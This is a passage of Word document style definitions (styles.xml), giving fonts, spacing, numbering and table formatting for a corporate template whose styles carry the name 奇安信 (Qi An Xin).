      <w:spacing w:before="360" w:after="360" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="标题 2（奇安信）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="标题 3（奇安信）"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="目录-名称（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="标题 4（奇安信）"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="1021"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="标题 5（无编号）（奇安信）"/>
    <w:basedOn w:val="37"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="保密申明（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38">
    <w:name w:val="标题 5（有编号）（奇安信）"/>
    <w:basedOn w:val="6"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39">
    <w:name w:val="标题 6（有编号）（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="表格内容靠左（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="页脚-页码（奇安信）"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:firstLine="300"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="插图标注（奇安信）"/>
    <w:next w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="表格标注（奇安信）"/>
    <w:basedOn w:val="42"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44">
    <w:name w:val="页脚页码（奇安信）"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:w="703" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="5598" w:y="247"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="封皮公司名（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:left="120" w:leftChars="50" w:right="120" w:rightChars="50"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="封皮主标题（奇安信）"/>
    <w:basedOn w:val="19"/>
    <w:next w:val="45"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="300" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="47">
    <w:name w:val="表格-头（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="正文（奇安信） 字符"/>
    <w:link w:val="29"/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="19"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="页脚 Char"/>
    <w:semiHidden/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55">
    <w:name w:val="变更与声明加粗（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="56"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="50" w:leftChars="50" w:right="50" w:rightChars="50"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="变更与声明加粗（奇安信） 字符"/>
    <w:link w:val="55"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57">
    <w:name w:val="变更与声明内容（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="25" w:beforeLines="25" w:after="25" w:afterLines="25" w:line="400" w:lineRule="exact"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="58">
    <w:name w:val="标题 0（奇安信）"/>
    <w:basedOn w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="59">
    <w:name w:val="目录 条目（奇安信）"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="60">
    <w:name w:val="列表（编号一级）（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="25" w:beforeLines="25"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="文本字符强调（奇安信）"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="21"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="列表（符号一级）（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="63">
    <w:name w:val="正文两侧缩进（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:left="200" w:leftChars="200" w:right="200" w:rightChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="64">
    <w:name w:val="附录1（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="100" w:afterLines="100" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="44"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="65">
    <w:name w:val="附录2（奇安信）"/>
    <w:basedOn w:val="64"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50"/>
      <w:ind w:right="100" w:rightChars="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="66">
    <w:name w:val="附录3（奇安信）"/>
    <w:basedOn w:val="65"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="67">
    <w:name w:val="附录4（奇安信）"/>
    <w:basedOn w:val="66"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:spacing w:before="163" w:after="163"/>
      <w:ind w:left="1571" w:leftChars="100" w:right="210"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="68">
    <w:name w:val="标题 6（无编号）（奇安信）"/>
    <w:basedOn w:val="7"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="69">
    <w:name w:val="列表（编号二级）（奇安信）"/>
    <w:basedOn w:val="60"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:beforeLines="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="70">
    <w:name w:val="列表（符号二级）（奇安信）"/>
    <w:basedOn w:val="62"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:ind w:left="1260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="14"/>
    <w:semiHidden/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72">
    <w:name w:val="文本段落引用（奇安信）"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="73">
    <w:name w:val="文本段落强调（奇安信）"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74">
    <w:name w:val="版权说明（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="75">
    <w:name w:val="表格内容居中（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="76">
    <w:name w:val="表正文"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="77"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="77">
    <w:name w:val="表正文 字符"/>
    <w:link w:val="76"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79">
    <w:name w:val="目录 2（奇安信）"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80">
    <w:name w:val="目录 3（奇安信）"/>
    <w:basedOn w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="81">
    <w:name w:val="正文左侧缩进（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:left="200" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82">
    <w:name w:val="文档属性标题（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="inside" w:y="121"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="83">
    <w:name w:val="插图（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="42"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="78" w:beforeLines="25" w:after="78" w:afterLines="25" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="84">
    <w:name w:val="文档表格标题行列型（奇安信）"/>
    <w:basedOn w:val="25"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
    <w:tblP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
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="85">
    <w:name w:val="文档表格无标题行型（奇安信）"/>
    <w:basedOn w:val="25"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
    <w:tblP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
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="86">
    <w:name w:val="文档表格无标题列型（奇安信）"/>
    <w:basedOn w:val="25"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
    <w:tblP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Pr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="87">
    <w:name w:val="文档属性（奇安信）"/>
    <w:basedOn w:val="82"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr/>
      <w:ind w:left="50" w:leftChars="50"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="88">
    <w:name w:val="封页内容（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="5678"/>
      </w:tabs>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="50" w:afterLines="50" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="89">
